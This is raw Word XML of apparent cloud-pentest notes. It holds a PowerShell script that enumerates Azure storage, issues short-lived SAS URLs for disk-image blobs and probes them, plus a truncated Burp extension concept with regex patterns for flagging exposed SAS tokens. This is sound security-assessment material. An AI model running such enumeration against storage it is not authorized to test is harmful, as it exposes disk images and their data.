    <w:p w14:paraId="2AF726A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Write-Host "`n[*] Checking storage account: $($storageAccount.StorageAccountName)"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66936C2B" w14:textId="77777777" w:rsidR="00F265C5" w:rsidRPr="00B92848" w:rsidRDefault="00F265C5" w:rsidP="00F265C5">
      <w:pPr>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="40A9938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$ctx = $storageAccount.Context</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="448D56B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$containers = Get-AzStorageContainer -Context $ctx</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D449EEA" w14:textId="77777777" w:rsidR="00F265C5" w:rsidRPr="00B92848" w:rsidRDefault="00F265C5" w:rsidP="00F265C5">
      <w:pPr>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4C91818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foreach ($container in $containers) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0523D28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Write-Host "  [+] Container: $($container.Name)"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A4FF90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$blobs = Get-AzStorageBlob -Container $container.Name -Context $ctx</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79126586" w14:textId="77777777" w:rsidR="00F265C5" w:rsidRPr="00B92848" w:rsidRDefault="00F265C5" w:rsidP="00F265C5">
      <w:pPr>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="51CDC4E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foreach ($blob in $blobs) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E07E29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# Check for VHD or disk images</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F8D247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if ($blob.Name -like "*.vhd" -or $blob.Name -like "*disk*") {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14BD6A2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$sasToken = New-AzStorageBlobSASToken -Container $container.Name `</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="419E7AE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-Blob $blob.Name -Permission r -ExpiryTime (Get-Date).AddMinutes(5) `</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77DD480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lastRenderedPageBreak/>
        <w:t xml:space="preserve">                    -Context $ctx -FullUri</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F222902" w14:textId="77777777" w:rsidR="00F265C5" w:rsidRPr="00B92848" w:rsidRDefault="00F265C5" w:rsidP="00F265C5">
      <w:pPr>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5C8C2F8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Write-Host "    [!] Found disk-like blob: $($blob.Name)"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09084D5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Write-Host "        Test SAS URL: $sasToken"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E8C1A1D" w14:textId="77777777" w:rsidR="00F265C5" w:rsidRPr="00B92848" w:rsidRDefault="00F265C5" w:rsidP="00F265C5">
      <w:pPr>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7FD288A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# Optional: Test if URL is publicly accessible</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AD1386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try {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="576D70B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$response = Invoke-WebRequest -Uri $sasToken -Method Head -TimeoutSec 10</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C89867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if ($response.StatusCode -eq 200) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62F7DA8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    Write-Host "        [!!] Accessible Blob: $sasToken" -ForegroundColor Red</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5987EE7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} else {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4ED55C79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    Write-Host "        [-] Not accessible anonymously"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A495BB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}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B51039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} catch {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E040FA7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Write-Host "        [-] Access denied or failed"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CD931F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}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="435DADD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}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BE2C8E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}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4643124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}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1621E48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}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D48A646" w14:textId="77777777" w:rsidR="00F265C5" w:rsidRPr="00B92848" w:rsidRDefault="00000000" w:rsidP="00F265C5">
      <w:pPr>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:pict w14:anchorId="70C1F610">
          <v:rect id="_x0000_i1035" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="571F8ABE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🧪</w:t>
      </w:r>
      <w:r w:rsidRPr="00B92848">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> What This Script Does</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="701A8784" w14:textId="77777777" w:rsidR="00F265C5" w:rsidRPr="00B92848" w:rsidRDefault="00F265C5" w:rsidP="00F265C5">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="287"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B92848">
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>Connects to your target Azure subscription.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44CDD3C1" w14:textId="77777777" w:rsidR="00F265C5" w:rsidRPr="00B92848" w:rsidRDefault="00F265C5" w:rsidP="00F265C5">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="287"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B92848">
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Enumerates </w:t>
      </w:r>
      <w:r w:rsidRPr="00B92848">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>all storage accounts and containers</w:t>
      </w:r>
      <w:r w:rsidRPr="00B92848">
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2741763F" w14:textId="77777777" w:rsidR="00F265C5" w:rsidRPr="00B92848" w:rsidRDefault="00F265C5" w:rsidP="00F265C5">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="287"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B92848">
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>Looks for blob names likely related to disks (e.g., .vhd, disk).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15620E47" w14:textId="77777777" w:rsidR="00F265C5" w:rsidRPr="00B92848" w:rsidRDefault="00F265C5" w:rsidP="00F265C5">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="287"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B92848">
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Generates a </w:t>
      </w:r>
      <w:r w:rsidRPr="00B92848">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>short-lived SAS token</w:t>
      </w:r>
      <w:r w:rsidRPr="00B92848">
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DCA86E4" w14:textId="77777777" w:rsidR="00F265C5" w:rsidRPr="00B92848" w:rsidRDefault="00F265C5" w:rsidP="00F265C5">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="287"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B92848">
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Optionally tests for </w:t>
      </w:r>
      <w:r w:rsidRPr="00B92848">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>public anonymous access</w:t>
      </w:r>
      <w:r w:rsidRPr="00B92848">
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> via HTTP HEAD.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DA5D583" w14:textId="77777777" w:rsidR="00F265C5" w:rsidRPr="00B92848" w:rsidRDefault="00000000" w:rsidP="00F265C5">
      <w:pPr>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:pict w14:anchorId="5C09B10E">
          <v:rect id="_x0000_i1036" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DFCBFA8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⚠️</w:t>
      </w:r>
      <w:r w:rsidRPr="00B92848">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> Caution (Ethical Use Only)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54516B4B" w14:textId="77777777" w:rsidR="00F265C5" w:rsidRPr="00B92848" w:rsidRDefault="00F265C5" w:rsidP="00F265C5">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="288"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B92848">
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>Only use on assets you are authorized to test.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="528DFF3A" w14:textId="77777777" w:rsidR="00F265C5" w:rsidRPr="00B92848" w:rsidRDefault="00F265C5" w:rsidP="00F265C5">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="288"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B92848">
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>Use Get-AzStorageAccountKey if required for private key-based enumeration.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C852BE3" w14:textId="77777777" w:rsidR="00F265C5" w:rsidRPr="00B92848" w:rsidRDefault="00F265C5" w:rsidP="00F265C5">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="288"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B92848">
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>Disable anonymous blob access and long-lived SAS tokens in production environments.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BF178D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Would you also like a Burp Suite extension or plugin idea for scanning exposed SAS URLs in web apps or responses?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49B472C4" w14:textId="77777777" w:rsidR="00F265C5" w:rsidRDefault="00F265C5" w:rsidP="00F265C5">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US" w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2AA3B3AE" w14:textId="77777777" w:rsidR="00F265C5" w:rsidRDefault="00F265C5" w:rsidP="00F265C5">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US" w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6530D1F5" w14:textId="77777777" w:rsidR="00F265C5" w:rsidRDefault="00F265C5" w:rsidP="00F265C5">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US" w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1CF3833D" w14:textId="77777777" w:rsidR="00F265C5" w:rsidRPr="00B92848" w:rsidRDefault="00F265C5" w:rsidP="00F265C5">
      <w:pPr>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="44FE8FD4" w14:textId="77777777" w:rsidR="00F265C5" w:rsidRDefault="00F265C5" w:rsidP="00F265C5">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr>
          <w:b w:val="0"/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B92848">
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>Burp Suite Extension: Azure SAS URL Finder &amp; Analyzer</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74E09B98" w14:textId="77777777" w:rsidR="00F265C5" w:rsidRDefault="00F265C5" w:rsidP="00F265C5">
      <w:pPr>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B92848">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>Burp Suite extension/plugin concept</w:t>
      </w:r>
      <w:r w:rsidRPr="00B92848">
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> for identifying </w:t>
      </w:r>
      <w:r w:rsidRPr="00B92848">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>exposed or insecure Azure SAS URLs</w:t>
      </w:r>
      <w:r w:rsidRPr="00B92848">
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>, especially targeting disk exports (.vhd) and blob file access:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67BDFF6A" w14:textId="77777777" w:rsidR="00F265C5" w:rsidRDefault="00F265C5" w:rsidP="00F265C5">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7EFC869B" w14:textId="77777777" w:rsidR="00F265C5" w:rsidRPr="00B92848" w:rsidRDefault="00F265C5" w:rsidP="00F265C5">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="38C4E73D" w14:textId="77777777" w:rsidR="00F265C5" w:rsidRPr="00BE6ED7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🧩</w:t>
      </w:r>
      <w:r w:rsidRPr="00B92848">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> Plugin Name:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00B92848">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>AzureSASInspector</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74E7DD9B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lastRenderedPageBreak/>
        <w:t>💡</w:t>
      </w:r>
      <w:r w:rsidRPr="00B92848">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> Purpose:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E2D8A5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Scan all HTTP responses for Azure Blob SAS URLs, then </w:t>
      </w:r>
      <w:r w:rsidRPr="00B92848">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>analyse</w:t>
      </w:r>
      <w:r w:rsidRPr="00B92848">
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> and </w:t>
      </w:r>
      <w:r w:rsidRPr="00B92848">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>highlight insecure patterns</w:t>
      </w:r>
      <w:r w:rsidRPr="00B92848">
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> (long expiry, full access, missing IP restrictions, disk export patterns, etc.).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34209EA5" w14:textId="77777777" w:rsidR="00F265C5" w:rsidRPr="00B92848" w:rsidRDefault="00F265C5" w:rsidP="00F265C5">
      <w:pPr>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6272E998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✅</w:t>
      </w:r>
      <w:r w:rsidRPr="00B92848">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> Key Features</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D785B43" w14:textId="77777777" w:rsidR="00F265C5" w:rsidRPr="00B92848" w:rsidRDefault="00F265C5" w:rsidP="00F265C5">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="289"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B92848">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>Regex Detection:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D51FA86" w14:textId="77777777" w:rsidR="00F265C5" w:rsidRPr="00B92848" w:rsidRDefault="00F265C5" w:rsidP="00F265C5">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="289"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B92848">
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>Searches for Azure Blob URLs with SAS tokens:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D04B0CA" w14:textId="77777777" w:rsidR="00F265C5" w:rsidRPr="00B92848" w:rsidRDefault="00F265C5" w:rsidP="00F265C5">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="289"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="1440"/>
        </w:tabs>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B92848">
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>https://&lt;account&gt;.blob.core.windows.net/&lt;container&gt;/&lt;blob&gt;?&lt;sas_token&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07FEDB27" w14:textId="77777777" w:rsidR="00F265C5" w:rsidRPr="00B92848" w:rsidRDefault="00F265C5" w:rsidP="00F265C5">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="289"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B92848">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>Risk Flags:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="572A0942" w14:textId="77777777" w:rsidR="00F265C5" w:rsidRPr="00B92848" w:rsidRDefault="00F265C5" w:rsidP="00F265C5">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="289"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B92848">
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>Flags based on:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02B21B9F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.vhd or .vhdx extensions (likely disk exports)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05DA52CB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sig= present without se= (missing expiry)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23A6F9C9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Expiry (se=...) &gt; 7 days from now</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57C95BCA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Full permissions (sp=rw or sp=rwdlacup)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62D345C9" w14:textId="77777777" w:rsidR="00F265C5" w:rsidRPr="00B92848" w:rsidRDefault="00F265C5" w:rsidP="00F265C5">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="289"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B92848">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>Automated Validation (optional toggle):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E2919AB" w14:textId="77777777" w:rsidR="00F265C5" w:rsidRPr="00B92848" w:rsidRDefault="00F265C5" w:rsidP="00F265C5">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="289"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B92848">
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>Makes HEAD request to each detected SAS URL</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69CA934E" w14:textId="77777777" w:rsidR="00F265C5" w:rsidRPr="00B92848" w:rsidRDefault="00F265C5" w:rsidP="00F265C5">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="289"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B92848">
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>Checks if accessible anonymously (200 OK)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B81FD8A" w14:textId="77777777" w:rsidR="00F265C5" w:rsidRPr="00B92848" w:rsidRDefault="00F265C5" w:rsidP="00F265C5">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="289"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B92848">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>Export/Report Mode:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64E867AE" w14:textId="77777777" w:rsidR="00F265C5" w:rsidRPr="00B92848" w:rsidRDefault="00F265C5" w:rsidP="00F265C5">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="289"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B92848">
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>Dump all matched URLs to a CSV or HTML table with:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42DE622A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Risk rating (Low / Med / High)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6868CAEF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Blob name</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="173E1F53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Expiry time</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4544673A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Permissions</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C38FF20" w14:textId="77777777" w:rsidR="00F265C5" w:rsidRPr="00B92848" w:rsidRDefault="00F265C5" w:rsidP="00F265C5">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="289"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B92848">
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>Accessible? (Yes/No)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61A04D68" w14:textId="77777777" w:rsidR="00F265C5" w:rsidRPr="00B92848" w:rsidRDefault="00F265C5" w:rsidP="00F265C5">
      <w:pPr>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5DC68671" w14:textId="77777777" w:rsidR="00F265C5" w:rsidRPr="00B92848" w:rsidRDefault="00F265C5" w:rsidP="00F265C5">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B92848">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>🛠️</w:t>
      </w:r>
      <w:r w:rsidRPr="00B92848">
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> Implementation Overview (Python / Jython)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="242079F7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Here’s a minimal prototype using Burp's extender API:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CF3B53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import re</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C7B2F67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import urllib.request</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CD6865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from datetime import datetime</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CED990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from burp import IBurpExtender, IScannerCheck, IScanIssue</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72150D1D" w14:textId="77777777" w:rsidR="00F265C5" w:rsidRPr="00B92848" w:rsidRDefault="00F265C5" w:rsidP="00F265C5">
      <w:pPr>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2CA514B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class BurpExtender(IBurpExtender, IScannerCheck):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54194C3C" w14:textId="77777777" w:rsidR="00F265C5" w:rsidRPr="00B92848" w:rsidRDefault="00F265C5" w:rsidP="00F265C5">
      <w:pPr>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="698E6EC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registerExtenderCallbacks(self, callbacks):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="183C2E4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self._helpers = callbacks.getHelpers()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57C8CBF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callbacks.setExtensionName("Azure SAS URL Inspector")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D45789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callbacks.registerScannerCheck(self)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D309CC9" w14:textId="77777777" w:rsidR="00F265C5" w:rsidRPr="00B92848" w:rsidRDefault="00F265C5" w:rsidP="00F265C5">
      <w:pPr>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4CFBB9F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doPassiveScan(self, baseRequestResponse):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="701AF93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issues = []</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55D6EEA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response = baseRequestResponse.getResponse()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="318E16F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if not response:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3313F89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return None</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2033AFA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lastRenderedPageBreak/>
        <w:t xml:space="preserve">        response_info = self._helpers.analyzeResponse(response)</w:t>
